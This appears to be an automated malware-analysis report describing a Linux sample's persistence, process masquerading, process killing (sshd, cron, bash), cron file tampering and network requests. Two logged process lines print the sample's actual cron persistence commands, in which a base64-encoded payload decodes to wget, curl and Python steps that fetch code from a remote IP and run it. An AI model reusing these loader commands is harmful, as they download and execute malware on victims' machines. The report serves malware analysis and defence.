Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
- /etc/cron.hourly/root
- /etc/cron.daily/root
- /etc/cron.weekly/root
- /etc/cron.monthly/root
- /etc/crontab
Malicious functions:
Launches itself as a daemon
Substitutes application name for:
- kubm
- hgyq
- vhlr
- tbkv
- jcwx
- vdfp
- jwhu
- jmeh
Launches processes:
- sh -c /var/tmp/cia kubm &
- /var/tmp/cia kubm
- sh -c echo '* * * * * ( while true; do echo -n \"d2dldCAtTyAtIGh0dHA6Ly8xODUuMTAuNjguMTAwL2pwL2ouc2h8c2ggPi9kZXYvbnVsbCAyPiYxICB8fCBjdXJsIGh0dHA6Ly8xODUuMTAuNjguMTAwL2pwL2ouanBnfHNoID4vZGV2L251bGwgMj4mMSAgfHwgcHl0aG9uIC1jICdpbXBvcnQgb3M7aW1wb3J0IHVybGxpYjtoZD11cmxsaWIudXJscmV0cmlldmUoImh0dHA6Ly8xODUuMTAuNjguMTAwL2pwL2ptIiwiL3Zhci90bXAvcnZkIik7b3Muc3lzdGVtKCJjaG1vZCA3Nzc3IC92YXIvdG1wL3J2ZCIpO29zLnN5c3RlbSgiY2htb2QgK3ggL3Zhci90bXAvcnZkIik7b3Muc3lzdGVtKCIvdmFyL3RtcC9ydmQiKScgPi9kZXYvbnVsbCAyPiYxIHx8ICBweXRob24gLWMgJ2ltcG9ydCBvcztpbXBvcnQgdXJsbGliO2hkPXVybGxpYi51cmxyZXRyaWV2ZSgiaHR0cDovLzE4NS4xMC42OC4xMDAvanAvam0iLCIvdG1wL2hsdiIpO29zLnN5c3RlbSgiY2htb2QgNzc3NyAvdG1wL2hsdiIpO29zLnN5c3RlbSgiY2htb2QgK3ggL3RtcC9obHYiKTtvcy5zeXN0ZW0oIi90bXAvaGx2IiknID4vZGV2L251bGwgMj4mMQ==\" | base64 -d |sh ; sleep 5; done & ) >/dev/null 2>&1' | crontab -;
- crontab -
- sh -c /tmp/cia hgyq &
- /tmp/cia hgyq
- sh -c /var/tmp/hdd vhlr &
- /var/tmp/hdd vhlr
- sh -c echo '* * * * * echo -n \"d2dldCAtTyAtIGh0dHA6Ly8xODUuMTAuNjguMTAwL2pwL2ouc2h8c2ggPi9kZXYvbnVsbCAyPiYxICB8fCBjdXJsIGh0dHA6Ly8xODUuMTAuNjguMTAwL2pwL2ouanBnfHNoID4vZGV2L251bGwgMj4mMSAgfHwgcHl0aG9uIC1jICdpbXBvcnQgb3M7aW1wb3J0IHVybGxpYjtoZD11cmxsaWIudXJscmV0cmlldmUoImh0dHA6Ly8xODUuMTAuNjguMTAwL2pwL2ptIiwiL3Zhci90bXAvcnZkIik7b3Muc3lzdGVtKCJjaG1vZCA3Nzc3IC92YXIvdG1wL3J2ZCIpO29zLnN5c3RlbSgiY2htb2QgK3ggL3Zhci90bXAvcnZkIik7b3Muc3lzdGVtKCIvdmFyL3RtcC9ydmQiKScgPi9kZXYvbnVsbCAyPiYxIHx8ICBweXRob24gLWMgJ2ltcG9ydCBvcztpbXBvcnQgdXJsbGliO2hkPXVybGxpYi51cmxyZXRyaWV2ZSgiaHR0cDovLzE4NS4xMC42OC4xMDAvanAvam0iLCIvdG1wL2hsdiIpO29zLnN5c3RlbSgiY2htb2QgNzc3NyAvdG1wL2hsdiIpO29zLnN5c3RlbSgiY2htb2QgK3ggL3RtcC9obHYiKTtvcy5zeXN0ZW0oIi90bXAvaGx2IiknID4vZGV2L251bGwgMj4mMQ==\" | base64 -d |sh > /dev/null 2>&1' | crontab -;
- sh -c /tmp/hdd tbkv &
- /tmp/hdd tbkv
- sh -c /root/yljbsr
- /root/yljbsr
- sh -c /root/jqtj vdfp
- sh -c /root/mmrr jwhu
- /root/jqtj vdfp
- /root/mmrr jwhu
- sh -c /root/yhtw jmeh
- /root/yhtw jmeh
Kills system processes:
- sshd
Kills the following processes:
- cron
- atd
- bash
Performs operations with the file system:
Modifies file access rights:
- /var/tmp/cia
- /var/spool/cron/crontabs
- /var/spool/cron/atjobs/.SEQ
- /var/spool/cron/atjobs
- /var/spool/cron/atspool
- /etc/cron.hourly/.placeholder
- /etc/cron.daily/passwd
- /etc/cron.daily/aptitude
- /etc/cron.daily/mlocate
- /etc/cron.daily/logrotate
- /etc/cron.daily/apt
- /etc/cron.daily/bsdmainutils
- /etc/cron.daily/.placeholder
- /etc/cron.daily/dpkg
- /etc/cron.daily/man-db
- /etc/cron.daily/exim4-base
- /etc/cron.weekly/.placeholder
- /etc/cron.weekly/man-db
- /etc/cron.monthly/.placeholder
- /etc/cron.d/.placeholder
- /tmp/cia
- /var/tmp/hdd
- /var/spool/cron/crontabs/tmp.kINIZC
- /var/spool/cron/crontabs/tmp.VVDeFE
- /var/spool/cron/crontabs/root
- /tmp/hdd
- /var/spool/cron/crontabs/tmp.x2nV43
- /var/spool/cron/crontabs/tmp.uN4tWg
- /var/spool/cron/crontabs/tmp.WpV9gQ
- /var/spool/cron/crontabs/tmp.SHH1GT
- /var/spool/cron/crontabs/tmp.OlKXBN
- /var/spool/cron/crontabs/tmp.SQPvvR
- /var/spool/cron/crontabs/tmp.oV4nIr
- /var/spool/cron/crontabs/tmp.GbLxaH
- /root/yljbsr
- /var/spool/cron/crontabs/tmp.BQ7L3F
- /var/spool/cron/crontabs/tmp.jMsVWC
- /var/spool/cron/crontabs/tmp.Dpd2Wu
- /var/spool/cron/crontabs/tmp.Krtvmv
- /root/jqtj
- /var/spool/cron/crontabs/tmp.mNWXkP
- /var/spool/cron/crontabs/tmp.vWr113
- /var/spool/cron/crontabs/tmp.00bYLo
- /var/spool/cron/crontabs/tmp.nkM2Qy
- /var/spool/cron/crontabs/tmp.S2nC0N
- /var/spool/cron/crontabs/tmp.ZiLJNT
- /var/spool/cron/crontabs/tmp.gJoaEM
- /var/spool/cron/crontabs/tmp.T0K1Ab
- /var/spool/cron/crontabs/tmp.FcYC3j
- /root/mmrr
- /var/spool/cron/crontabs/tmp.MUzaKE
- /var/spool/cron/crontabs/tmp.PdtC6d
- /var/spool/cron/crontabs/tmp.R3PoWe
- /var/spool/cron/crontabs/tmp.8UwoG3
- /root/yhtw
- /var/spool/cron/crontabs/tmp.1cbhcl
- /var/spool/cron/crontabs/tmp.L3vyJ3
- /var/spool/cron/crontabs/tmp.yNsXKG
- /var/spool/cron/crontabs/tmp.3AG2Wr
- /var/spool/cron/crontabs/tmp.WloLRs
- /var/spool/cron/crontabs/tmp.LSbtqW
- /var/spool/cron/crontabs/tmp.1M2JAq
- /var/spool/cron/crontabs/tmp.oSA01n
- /var/spool/cron/crontabs/tmp.YBoQMo
- /var/spool/cron/crontabs/tmp.5A4ReD
- /var/spool/cron/crontabs/tmp.u9pS7Q
- /var/spool/cron/crontabs/tmp.NWHkz0
- /var/spool/cron/crontabs/tmp.lc2c06
- /var/spool/cron/crontabs/tmp.pS6QaS
- /var/spool/cron/crontabs/tmp.2VQw1W
- /var/spool/cron/crontabs/tmp.SP2PFW
- /var/spool/cron/crontabs/tmp.RZuQEO
- /var/spool/cron/crontabs/tmp.Ayrk0e
- /var/spool/cron/crontabs/tmp.EUvK89
- /var/spool/cron/crontabs/tmp.Hkffed
- /var/spool/cron/crontabs/tmp.EpEWHe
- /var/spool/cron/crontabs/tmp.NPmtRL
- /var/spool/cron/crontabs/tmp.Vvp5X1
- /var/spool/cron/crontabs/tmp.vuCGNW
- /var/spool/cron/crontabs/tmp.IREJHJ
- /var/spool/cron/crontabs/tmp.Q3UGpW
- /var/spool/cron/crontabs/tmp.VuOO2r
- /var/spool/cron/crontabs/tmp.iGyAP7
- /var/spool/cron/crontabs/tmp.ow2fGL
- /var/spool/cron/crontabs/tmp.2uVZEx
- /var/spool/cron/crontabs/tmp.jb9Eny
Creates folders:
- /var/spool/cron/crontabs
Deletes folders:
- /var/spool/cron/atjobs
- /var/spool/cron/atspool
- /var/spool/cron/crontabs
Creates or modifies files:
- /var/tmp/cia
- /tmp/cia
- /var/tmp/hdd
- /var/spool/cron/crontabs/tmp.VVDeFE
- /var/spool/cron/crontabs/tmp.kINIZC
- /tmp/hdd
- /var/spool/cron/crontabs/tmp.x2nV43
- /var/spool/cron/crontabs/tmp.uN4tWg
- /var/spool/cron/crontabs/tmp.OlKXBN
- /var/spool/cron/crontabs/tmp.WpV9gQ
- /var/spool/cron/crontabs/tmp.SHH1GT
- /root/yljbsr
- /var/spool/cron/crontabs/tmp.SQPvvR
- /var/spool/cron/crontabs/tmp.oV4nIr
- /var/spool/cron/crontabs/tmp.GbLxaH
- /root/crontabs/tmp.Dpd2Wu
- /var/spool/cron/crontabs/tmp.jMsVWC
- /var/spool/cron/crontabs/tmp.BQ7L3F
- /var/spool/cron/crontabs/tmp.Krtvmv
- /var/spool/cron/crontabs/tmp.Dpd2Wu
- /root/jqtj
- /var/spool/cron/crontabs/tmp.mNWXkP
- /var/spool/cron/crontabs/tmp.vWr113
- /var/spool/cron/crontabs/tmp.00bYLo
- /var/spool/cron/crontabs/tmp.nkM2Qy
- /var/spool/cron/crontabs/tmp.S2nC0N
- /var/spool/cron/crontabs/tmp.ZiLJNT
- /var/spool/cron/crontabs/tmp.gJoaEM
- /var/spool/cron/crontabs/tmp.T0K1Ab
- /var/spool/cron/crontabs/tmp.FcYC3j
- /root/mmrr
- /var/spool/cron/crontabs/tmp.PdtC6d
- /var/spool/cron/crontabs/tmp.MUzaKE
- /var/spool/cron/crontabs/tmp.R3PoWe
- /root/yhtw
- /var/spool/cron/crontabs/tmp.8UwoG3
- /var/spool/cron/crontabs/tmp.L3vyJ3
- /var/spool/cron/crontabs/tmp.1cbhcl
- /root/p
- /var/spool/cron/crontabs/tmp.3AG2Wr
- /var/spool/cron/crontabs/tmp.yNsXKG
- /var/spool/cron/crontabs/tmp.WloLRs
- /root/crontabs/tmp.LSbtqW
- /var/spool/cron/crontabs/tmp.oSA01n
- /var/spool/cron/crontabs/tmp.1M2JAq
- /var/spool/cron/crontabs/tmp.YBoQMo
- /var/spool/cron/root
- /var/spool/cron/crontabs/tmp.5A4ReD
- /var/spool/cron/crontabs/tmp.LSbtqW
- /var/spool/cron/crontabs/tmp.u9pS7Q
- /var/spool/cron/crontabs/tmp.NWHkz0
- /var/spool/cron/crontabs/tmp.pS6QaS
- /var/spool/cron/crontabs/tmp.2VQw1W
- /var/spool/cron/crontabs/tmp.lc2c06
- /var/spool/cron/crontabs/tmp.RZuQEO
- /var/spool/cron/crontabs/tmp.SP2PFW
- /var/spool/cron/crontabs/tmp.EUvK89
- /var/spool/cron/crontabs/tmp.Ayrk0e
- /var/spool/cron/crontabs/tmp.EpEWHe
- /var/spool/cron/crontabs/tmp.Q3UGpW
- /var/spool/cron/crontabs/tmp.Hkffed
- /var/spool/cron/crontabs/tmp.Vvp5X1
- /var/spool/cron/crontabs/tmp.IREJHJ
- /var/spool/cron/crontabs/tmp.NPmtRL
- /var/spool/cron/crontabs/tmp.vuCGNW
- /var/spool/cron/crontabs/tmp.VuOO2r
- /var/spool/cron/crontabs/tmp.OKCSmv
- /var/spool/cron/crontabs/tmp.yJPoiH
- /var/spool/cron/crontabs/tmp.vzEOdY
- /var/spool/cron/crontabs/tmp.ow2fGL
- /var/spool/cron/crontabs/tmp.iGyAP7
- /var/spool/cron/crontabs/tmp.gjya7L
- /var/spool/cron/crontabs/tmp.RgTxhg
- /var/spool/cron/crontabs/tmp.jb9Eny
- /var/spool/cron/crontabs/tmp.2uVZEx
- /var/spool/cron/crontabs/tmp.ni8zag
- /var/spool/cron/crontabs/tmp.Cb0ebf
- /var/spool/cron/crontabs/tmp.Jj1P4z
- /var/spool/cron/crontabs/tmp.uF1Csl
- /var/spool/cron/crontabs/tmp.PHaMEb
Deletes files:
- /var/spool/cron/atjobs/.SEQ
- /etc/cron.hourly/.placeholder
- /etc/cron.daily/passwd
- /etc/cron.daily/aptitude
- /etc/cron.daily/mlocate
- /etc/cron.daily/logrotate
- /etc/cron.daily/apt
- /etc/cron.daily/bsdmainutils
- /etc/cron.daily/.placeholder
- /etc/cron.daily/dpkg
- /etc/cron.daily/man-db
- /etc/cron.daily/exim4-base
- /etc/cron.weekly/.placeholder
- /etc/cron.weekly/man-db
- /etc/cron.monthly/.placeholder
- /etc/cron.d/.placeholder
- /var/spool/cron/crontabs/root
- /root/p
- /var/spool/cron/crontabs/tmp.IREJHJ
- /var/spool/cron/crontabs/tmp.EpEWHe
- /var/spool/cron/crontabs/tmp.NPmtRL
- /var/spool/cron/crontabs/tmp.VuOO2r
- /var/spool/cron/crontabs/tmp.Q3UGpW
- /var/spool/cron/crontabs/tmp.yJPoiH
Network activity:
HTTP GET requests:
- 18#.##.68.100/jp/ldl
- 18#.##.68.100/jp/dld
- 18#.###.169.6/jp/lmmml
- 18#.###.169.6/jp/jrd
- 18#.###.169.6/jp/jpp
- 18#.###.169.6/jp/nvn